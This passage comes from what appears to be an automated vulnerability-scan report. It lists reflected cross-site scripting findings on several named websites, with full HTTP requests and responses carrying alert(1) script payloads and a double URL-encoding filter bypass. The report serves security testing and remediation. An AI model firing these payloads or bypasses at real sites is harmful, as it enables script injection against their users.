The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ee5"><script>alert(1)</script>4bed916ba21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c5ee5"><script>alert(1)</script>4bed916ba21=1 HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=divi8ktvms9d45k1rajt78o7o3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113020

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.researchingcrossing.com/?c5ee5"><script>alert(1)</script>4bed916ba21=1">
...[SNIP]...

3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93fb6"><script>alert(1)</script>28a079ac530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?93fb6"><script>alert(1)</script>28a079ac530=1 HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ste5haotf5vmef1qsurie2n7n5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105739

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.retailcrossing.com/?93fb6"><script>alert(1)</script>28a079ac530=1">
...[SNIP]...

3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0897"><script>alert(1)</script>765803bdfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0897"><script>alert(1)</script>765803bdfda=1 HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8sa88hljrj6q4ofs3se5guljd6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sciencescrossing.com/?f0897"><script>alert(1)</script>765803bdfda=1">
...[SNIP]...

3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28639"><script>alert(1)</script>c7ffa7b203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28639"><script>alert(1)</script>c7ffa7b203b=1 HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=iurdrjelo6pic6sm8jh3gs4hm7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107101

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.scientistcrossing.com/?28639"><script>alert(1)</script>c7ffa7b203b=1">
...[SNIP]...

3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117a5"><script>alert(1)</script>7d8b1b4448d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?117a5"><script>alert(1)</script>7d8b1b4448d=1 HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dhcgj2evje60sqquu78rls5h52; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sellingcrossing.com/?117a5"><script>alert(1)</script>7d8b1b4448d=1">
...[SNIP]...

3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ef3"><script>alert(1)</script>f655a652a29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?66ef3"><script>alert(1)</script>f655a652a29=1 HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=imr0t828o1o340ptffl1rftdv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109142

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sqlcrossing.com/?66ef3"><script>alert(1)</script>f655a652a29=1">
...[SNIP]...

3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8279"><script>alert(1)</script>68ad5a2e707 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8279"><script>alert(1)</script>68ad5a2e707=1 HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9of761brn29jbgj1khe0hgrsv7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99732

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.teenagercrossing.com/?d8279"><script>alert(1)</script>68ad5a2e707=1">
...[SNIP]...

3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c307"><script>alert(1)</script>2b1c4b9d948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c307"><script>alert(1)</script>2b1c4b9d948=1 HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkpor3jiobjf8rtm3qkl9ivgi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.telecomcrossing.com/?8c307"><script>alert(1)</script>2b1c4b9d948=1">
...[SNIP]...

3.117. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e was submitted in the REST URL parameter 3. This input was echoed as 8452f<img src=a onerror=alert(1)>f19e8466b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /consumer/ShowBinary/BEA%20Repository8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e/tfs/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:52 GMT
Content-length: 235
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Error authenticating to repository: BEA Repository8452f<img src=a onerror=alert(1)>f19e8466b3e
<p>
...[SNIP]...

3.118. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75 was submitted in the REST URL parameter 4. This input was echoed as 9f005<script>alert(1)</script>f87a8930f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:53 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs9f005<script>alert(1)</script>f87a8930f75/en_US/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.119. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa was submitted in the REST URL parameter 5. This input was echoed as b750d<script>alert(1)</script>07d5c9ab6aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_USb750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:58 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_USb750d<script>alert(1)</script>07d5c9ab6aa/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.120. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3 was submitted in the REST URL parameter 6. This input was echoed as f2843<script>alert(1)</script>33046238f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/videof2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:00 GMT
Content-length: 236
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/videof2843<script>alert(1)</script>33046238f3/content/data.xml does not exist.
<p>
...[SNIP]...

3.121. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9 was submitted in the REST URL parameter 7. This input was echoed as ce625<script>alert(1)</script>47ad2d14cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/contentce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
